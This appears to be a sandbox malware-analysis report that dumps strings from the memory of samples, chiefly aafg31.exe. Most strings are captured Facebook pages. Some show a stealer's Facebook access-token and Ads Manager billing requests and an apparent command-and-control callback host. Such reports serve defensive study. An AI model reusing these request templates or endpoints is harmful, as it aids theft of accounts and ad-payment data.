https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveSun, 28 May 2023 08:43:58 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Controlttps://edgeqqwL equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Alt-Svch3=":443"; ma=86400X-FB-Debugp7ZpyWmk1j0SAVhAqFTBTdvWIMMZWb3wru7yGT0dAx/b8QuuHDzfsXyCMZkSgslDnEHGDQH/JpX7m6DLuzk45g==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonepermissions-policyaccelerometer=(), ambient-light-sensor=(), bluetooth=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()document-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveSun, 28 May 2023 08:43:32 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.536328254.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922E5000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643832144.000001E2922E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: InitOnceExecuteOnceCreateSemaphoreWCreateSemaphoreExWCreateThreadpoolTimerSetThreadpoolTimerWaitForThreadpoolTimerCallbacksCloseThreadpoolTimerCreateThreadpoolWaitSetThreadpoolWaitCloseThreadpoolWaitFlushProcessWriteBuffersFreeLibraryWhenCallbackReturnsGetCurrentProcessorNumberCreateSymbolicLinkWGetCurrentPackageIdSetFileInformationByHandleInitializeConditionVariableWakeConditionVariableInitializeSRWLockAcquireSRWLockExclusiveTryAcquireSRWLockExclusiveReleaseSRWLockExclusiveSleepConditionVariableSRWCreateThreadpoolWorkSubmitThreadpoolWorkCloseThreadpoolWorkUnknown exceptionbad array new lengthstring too longmap/set too longMUI1stallinis0tallsisincmaduin_pwuerc_uslndbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.62https://www.facebook.com/ed/login/ice-bas/login/dev"="st"azoe"jsd""luid"=urce""sot=oesjazlsd&d=&uirce=&souxt=&nehttps://www.facebook.com/login/device-based/login/c_uonkieJscooocohttps://adsmanager.facebook.com/ads/manager/account_settings/account_billing/D:accountI{accountIdpayInfohttps://adsmanager.facebook.com/ads/manager/accounts</tbody>><tbody</tr><tr?act</td> <tdlastRowdata-sortpaidbilling_statushttps://adsmanager.facebook.com/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settingsaccess_token:{accountID:https://graph.facebook.com/v15.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1fb_uidfb_access_tokencan_pay_nowhttps://business.facebook.com/selectbusiness_id=businessookmarkshttps://www.facebook.com/pages/?category=your_pages&ref=b}:unt"le_switcher_eligible_profiles":{"co"profiageomePhasHmePhasHohttp://ss.apjeoighw.com/check/safe{"sid":0,"time":0,"rand_str":""}http://ss.apjeoighw.com/check/?sid=si#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastime_strandrJOhf01(92)3j5kl3;4y:jdF9%3gj,IH@<F7>84|8y&keinvalid vector subscriptinvalid string positionvector too long equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F equals www.facebook.com (Facebook)
                Source: D804.exe, 00000013.00000003.475009624.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: D804.exe, 00000013.00000003.475504479.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
                Source: D804.exe, 00000013.00000003.475594980.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' *.fbcdn.net *.facebook.com;script-src blob: data: 'self' 'unsafe-inline' 'unsafe-eval' *.facebook.com *.fbcdn.net;style-src data: blob: 'self' 'unsafe-inline' 'unsafe-eval' *.facebook.com *.fbcdn.net;connect-src adsmanager.facebook.com adsmanager-graph.facebook.com adsmanager.secure.facebook.com blob: 'self' *.fbcdn.net rupload.facebook.com wss://gateway.facebook.com wss://edge-chat.facebook.com wss://edge-chat-latest.facebook.com https://edge-chat.facebook.com/mqtt/pull https://edge-chat-latest.facebook.com/mqtt/pull *.facebook.com/rsrc.php/;font-src 'self' *.facebook.com *.fbcdn.net;img-src data: blob: 'self' *.facebook.com *.fbcdn.net *.fbsbx.com *.cdninstagram.com;media-src 'self' *.facebook.com *.fbcdn.net *.fbsbx.com *.cdninstagram.com;frame-src facebook.com *.facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com ms-excel:;manifest-src data: blob: 'self';report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' *.fbcdn.net *.facebook.com;script-src blob: data: 'self' 'unsafe-inline' 'unsafe-eval' *.facebook.com *.fbcdn.net;style-src data: blob: 'self' 'unsafe-inline' 'unsafe-eval' *.facebook.com *.fbcdn.net;connect-src adsmanager.facebook.com adsmanager-graph.facebook.com adsmanager.secure.facebook.com blob: 'self' 'unsafe-inline' 'unsafe-eval' *.fbcdn.net rupload.facebook.com wss://gateway.facebook.com wss://edge-chat.facebook.com wss://edge-chat-latest.facebook.com https://edge-chat.facebook.com/mqtt/pull https://edge-chat-latest.facebook.com/mqtt/pull *.facebook.com/rsrc.php/ *.facebook.com;font-src 'self' *.facebook.com *.fbcdn.net;img-src data: blob: 'self' *.facebook.com *.fbcdn.net *.fbsbx.com *.cdninstagram.com;media-src 'self' *.facebook.com *.fbcdn.net *.fbsbx.com *.cdninstagram.com;frame-src facebook.com *.facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com ms-excel:;manifest-src data: blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: entSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6041888917634349990"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F",serverLID:"7238151194283337711"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","KRRzZP8W8AECzgQbUYOd3IKm",63072000000,"/",true,false,true,".facebook.com"]],["DeferredCookie","addToQueue",[],["_js_sb","KRRzZDj7aOT7X84uQltSZg6C",63072000000,"/",false,false,true,".facebook.com"]],["TransportSelectingClientSingletonConditiona equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/@8 equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.643341224.000001E29227F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2FtA: equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ow.r equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com:443 equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F^ equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of range^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?httphttps?POSTGET/device-based/loginContent-Type: application/x-www-form-urlencodedfacebooksec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"ed-exchange;v=b3;q=0.9ng,*/*;q=0.8,application/signapplication/xml;q=0.9,image/webp,image/apation/xhtml+xml,Accept: text/html,applic0.1,eu;q=0.1;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,anq=0.9;q=0.8,ja;q=0.7,af;Accept-Language: en,ion: keep-alivectConne/selectHost: business.facebook.comsec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Mode: navigate: ?1Sec-Fetch-Userest: documentSec-Fetch-Dame-originch-Site: sSec-Fet/accountsHost: adsmanager.facebook.com/ads/manager/account_settings/account_billingadsmanager.facebook.combusiness.facebook.comok.comceboHost: www.fabile: ?0a-mosec-ch-urm: "Windows"latfosec-ch-ua-polor-scheme: lightefers-csec-ch-precure-Requests: 1de-InsUpgraetch-Site: noneSec-Fode: navigateetch-Mer: ?1c-Fetch-UsSementest: docutch-DSec-Fe/v15.0/k.comcebooHost: graph.fadows": "Winsec-ch-ua-platform-urlencodedpplication/x-www-formContent-type: aept: */*AccaceboOrigin: https://www.fame-sitetch-Site: stch-Mode: corsmptych-Dest: eook.com///www.facebReferer: https:ook.comw.facebHost: wwobile: ?0-ch-ua-msecindows"a-platform: "Ws-color-scheme: lightprefersec-ch-equests: 1ecure-RUpgrade-InsSec-Fetch-Site: noneMode: navigateSec-Fetch-ser: ?1Sec-Fetch-Uentst: documSec-Fetch-DeSec-Fetch-Site: same-originCache-Control: max-age=0vector<bool> too longalnumalnumalphaalphablankblankcntrlcntrlddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacesupperupperwwxdigitxdigitHq equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of range^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?httphttps?POSTGET/device-based/loginContent-Type: application/x-www-form-urlencodedfacebooksec-ch-ua: "Microsoft Edge";v="111", "Not(A:Brand";v="8", "Chromium";v="111"ed-exchange;v=b3;q=0.9ng,*/*;q=0.8,application/signapplication/xml;q=0.9,image/webp,image/apation/xhtml+xml,Accept: text/html,applic0.1,eu;q=0.1;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,anq=0.9;q=0.8,ja;q=0.7,af;Accept-Language: en,ion: keep-alivectConne/selectHost: business.facebook.comsec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Mode: navigate: ?1Sec-Fetch-Userest: documentSec-Fetch-Dame-originch-Site: sSec-Fet/accountsHost: adsmanager.facebook.com/ads/manager/account_settings/account_billingadsmanager.facebook.combusiness.facebook.comok.comceboHost: www.fabile: ?0a-mosec-ch-urm: "Windows"latfosec-ch-ua-polor-scheme: lightefers-csec-ch-precure-Requests: 1de-InsUpgraetch-Site: noneSec-Fode: navigateetch-Mer: ?1c-Fetch-UsSementest: docutch-DSec-Fe/v15.0/k.comcebooHost: graph.fadows": "Winsec-ch-ua-platform-urlencodedpplication/x-www-formContent-type: aept: */*AccaceboOrigin: https://www.fame-sitetch-Site: stch-Mode: corsmptych-Dest: eook.com///www.facebReferer: https:ook.comw.facebHost: wwobile: ?0-ch-ua-msecindows"a-platform: "Ws-color-scheme: lightprefersec-ch-equests: 1ecure-RUpgrade-InsSec-Fetch-Site: noneMode: navigateSec-Fetch-ser: ?1Sec-Fetch-Uentst: documSec-Fetch-DeSec-Fetch-Site: same-originCache-Control: max-age=0vector<bool> too longalnumalnumalphaalphablankblankcntrlcntrlddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacesupperupperwwxdigitxdigitHq! equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559523108.000001E292290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: itle><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php? equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559523108.000001E292290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: itle><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?X equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: low the use of cookies by Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_al50\">\u003Cdiv>\u003Cp>We use cookies and similar technologies to help provide and improve content on \u003Ca href=\"https:\/\/www.facebook.com\/help\/1561485474074139\" target=\"_blank\">Meta Products\u003C\/a>. We also use them to provide a safer experience by using information we receive from cookies on and off Facebook, and to provide and improve Meta Products for people who have an account.\u003C\/p>\u003Cul class=\"_al51\">\u003Cli class=\"_al52\">\u003Cspan class=\"_al53\">Essential cookies: These cookies are required to use Meta Products and are necessary for our sites to work as intended.\u003C\/span>\u003C\/li>\u003Cli class=\"_al52\">\u003Cspan class=\"_al53\">Cookies from other companies: We use these cookies to show you ads off of Meta Products and to provide features like maps and videos on Meta Products. These cookies are optional.\u003C\/span>\u003C\/li>\u003C\/ul>\u003Cp>You have control over the optional cookies we use. Learn more about cookies and how we use them, and review or change your choices at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/privacy\/policies\/cookies\" id=\"cpn-pv-link\" target=\"_blank\">Cookies Policy\u003C\/a>.\u003C\/p>\u003Chr class=\"_al5e\" \/>\u003C\/div>\u003Cdiv>\u003Ch2>About cookies\u003C\/h2>\u003Cdiv class=\"_al5i\">\u003Cdiv class=\"_al4y\" title=\"What are cookies?\" id=\"u_0_9_Ai\">\u003Cimg sr equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_al50\">\u003Cdiv>\u003Cp>We use cookies and similar technologies to help provide and improve content on \u003Ca href=\"https:\/\/www.facebook.com\/help\/1561485474074139\" target=\"_blank\">Meta Products\u003C\/a>. We also use them to provide a safer experience by using information we receive from cookies on and off Facebook, and to provide and improve Meta Products for people who have an account.\u003C\/p>\u003Cul class=\"_al51\">\u003Cli class=\"_al52\">\u003Cspan class=\"_al53\">Essential cookies: These cookies are required to use Meta Products and are necessary for our sites to work as intended.\u003C\/span>\u003C\/li>\u003Cli class=\"_al52\">\u003Cspan class=\"_al53\">Cookies from other companies: We use these cookies to show you ads off of Meta Products and to provide features like maps and videos on Meta Products. These cookies are optional.\u003C\/span>\u003C\/li>\u003C\/ul>\u003Cp>You have control over the optional cookies we use. Learn more about cookies and how we use them, and review or change your choices at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/privacy\/policies\/cookies\" id=\"cpn-pv-link\" target=\"_blank\">Cookies Policy\u003C\/a>.\u003C\/p>\u003Chr class=\"_al5e\" \/>\u003C\/div>\u003Cdiv>\u003Ch2>About cookies\u003C\/h2>\u003Cdiv class=\"_al5i\">\u003Cdiv class=\"_al4y\" title=\"What are cookies?\" id=\"u_0_9_uw\">\u003Cimg src=\"https:\/\/www.facebook.com\/imag equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.536338668.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n" id="meta_referrer" /><script nonce="v6hVXULl">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvdLY","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmSTo8","isCQuick":false});</script><script nonce="v6hVXULl">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="v6hVXULl"></style><script nonce="v6hVXULl">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: olicy: default-src data: blob: 'self' *.fbcdn.net *.facebook.com;script-src blob: data: 'self' 'unsafe-inline' 'unsafe-eval' *.facebook.com *.fbcdn.net;style-src data: blob: 'self' 'unsafe-inline' 'unsafe-eval' *.facebook.com *.fbcdn.net;connect-src adsmanager.facebook.com adsmanager-graph.facebook.com adsmanager.secure.facebook.com blob: 'self' 'unsafe-inline' 'unsafe-eval' *.fbcdn.net rupload.facebook.com wss://gateway.facebook.com wss://edge-chat.facebook.com wss://edge-chat-latest.facebook.com https://edge-chat.facebook.com/mqtt/pull https://edge-chat-latest.facebook.com/mqtt/pull *.facebook.com/rsrc.php/ *.facebook.com;font-src 'self' *.facebook.com *.fbcdn.net;img-src data: blob: 'self' *.facebook.com *.fbcdn.net *.fbsbx.com *.cdninstagram.com;media-src 'self' *.facebook.com *.fbcdn.net *.fbsbx.com *.cdninstagram.com;frame-src facebook.com *.facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com ms-excel:;manifest-src data: blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
